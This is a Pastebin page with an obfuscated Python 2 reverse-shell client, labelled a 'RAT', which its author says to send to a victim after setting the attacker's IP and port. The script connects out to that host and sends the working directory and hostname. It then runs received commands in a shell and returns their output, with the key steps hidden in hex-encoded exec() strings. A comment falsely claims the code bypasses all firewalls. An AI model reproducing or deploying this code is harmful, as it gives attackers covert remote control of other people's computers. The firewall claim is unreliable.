Advertisement
tanmay606

Stable Python Rat [ Pr0-R@T0n ] Client Script

Mar 19th, 2015
448
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.61 KB | None | 0 0
  1. #!/usr/bin/python
  2. # Simple Reverse Shell Written by: Tanmay Upadhyay (13lackD3M0n)
  3. # [NOTE] Only for Educational Purpose. [/NOTE]
  4. #
  5. # Th@nks Expl0it-Db For BYP@$$ Fir3W@ll Expl0it.
  6. #
  7. # Pr0-R@T0n : Patch / Client.
  8. #
  9. # [!] Send this to Victim. After Changing Ip Address.
  10.  
  11. server = 'localhost' # Dont Forgot to change this.
  12. port = '4444' # Dont Forgot to change this.
  13.  
  14. #******************************************************************************************************************************************************************
  15. port = int(port);
  16. __init__ = '\x69\x6d\x70\x6f\x72\x74\x20\x6f\x73\x2c\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2c\x73\x6f\x63\x6b\x65\x74'
  17. BYPASS_FIREWALL = '\x23\x68\x65\x68\x65\x68\x65\x20\x62\x79\x70\x61\x73\x73\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x69\x73\x20\x65\x61\x73\x79\x20\x61\x73\x20\x74\x68\x69\x73\x20\x3b\x29'
  18. exec(BYPASS_FIREWALL) # THIS CODE BYPASS ALL TYPE OF FIREWALL [ WINDOWS, LINUX, MAC ]. [ NO ADMIN ACCESS NEEDED ]
  19. exec(__init__)
  20. def __class__():
  21.  global_var = '\x67\x6c\x6f\x62\x61\x6c\x20\x64\x61\x74\x61'
  22.  exec(global_var)
  23.  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  24.  while True:
  25.   try:
  26.    conn_ = '\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x73\x65\x72\x76\x65\x72\x2c\x70\x6f\x72\x74\x29\x29'
  27.    exec(conn_)
  28.    s.send(os.getcwd())
  29.    s.send(socket.gethostname())
  30.    data = s.recv(9098)
  31.    if("CD:" in data):
  32.     _CD_ = '\x63\x5f\x64\x69\x72\x20\x3d\x20\x64\x61\x74\x61\x2e\x73\x70\x6c\x69\x74\x28\x27\x43\x44\x3a\x27\x29\x5b\x31\x5d\x3b\x6f\x73\x2e\x63\x68\x64\x69\x72\x28\x63\x5f\x64\x69\x72\x29';exec(_CD_)
  33.    else:
  34.     __network__='\x70\x72\x6f\x63\x20\x3d\x20\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x50\x6f\x70\x65\x6e\x28\x64\x61\x74\x61\x2c\x20\x73\x74\x64\x6f\x75\x74\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x50\x49\x50\x45\x2c\x20\x73\x74\x64\x65\x72\x72\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x50\x49\x50\x45\x2c\x20\x73\x68\x65\x6c\x6c\x3d\x54\x72\x75\x65\x29\x3b\x73\x74\x64\x6f\x75\x74\x5f\x76\x61\x6c\x75\x65\x20\x3d\x20\x70\x72\x6f\x63\x2e\x73\x74\x64\x6f\x75\x74\x2e\x72\x65\x61\x64\x28\x29\x20\x2b\x20\x70\x72\x6f\x63\x2e\x73\x74\x64\x65\x72\x72\x2e\x72\x65\x61\x64\x28\x29'
  35.     exec(__network__)
  36.     s.send(stdout_value)
  37.     s.close()
  38.   except:
  39.    s.close()
  40.    __class__()
  41. try:
  42.  __class__()
  43. except RuntimeError:
  44.  print "[-] Unable To Connect to Attacker. Incorrect Ip Or No Internet Connection."
  45.  raw_input('\nPress Enter To Exit.')
  46. #*****************************************************************************************************************************************************************
  47. #13lackD3M0n
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement